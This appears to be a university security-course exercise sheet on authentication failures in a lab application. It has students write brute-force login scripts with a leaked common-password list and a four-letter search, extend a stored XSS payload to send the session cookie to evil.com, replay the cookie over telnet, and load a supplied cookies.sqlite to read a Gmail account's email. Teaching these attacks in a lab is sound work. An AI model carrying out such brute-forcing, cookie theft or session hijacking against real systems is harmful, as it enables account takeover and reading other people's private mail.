Exercise: Identification and Authentication Failures

Bruteforce a login system

We have an application: KIS Klinik Sonnenschein. We want to bruteforce the site.
Automate login tests.
Wirte a small php (or java or python, or what you want) program to be run on your laptop. This program must send a request for login, where you can input a username and a password. You must test if the login is valid or not. You can test with the user house. The password is given in Moodle.
Brute force the login
  • Modify your program to test with the list of most often used passwords Passwords. Select the list darkweb2017-top100.txt. You will test user bie1.
  • Modify the previous program, such that you can loop all possible passwords with 4 letters.
    Find the password for user taub (this could last for a long time, start the next exercise while waiting for the result).

Access the sessionID cookie

This exercise is to be done in the application for the "guestbook" in your Virtual Machine.
  • Modify your stored XSS script in order to read the session ID cookie.
  • Send the cookie by generating a new script node (<script src="https://evil.com/?sessionID=xxxxxx"></script>). You do not need to have such a server, just verify inside the browser that a request has been sent.
  • Generate manualy a get request containing this cookie.
    $ telnet localhost 80
    You should see the page with the change password form (meaning that you are logged-in).

Credentials Theft

In Firefox, create a new profile. Download the cookies.sqlite file in the Moodle. Copy this file in the profile directory that has been created for your new profile. Restart Firefox.
Access to gmail.com. Read the emails of the user.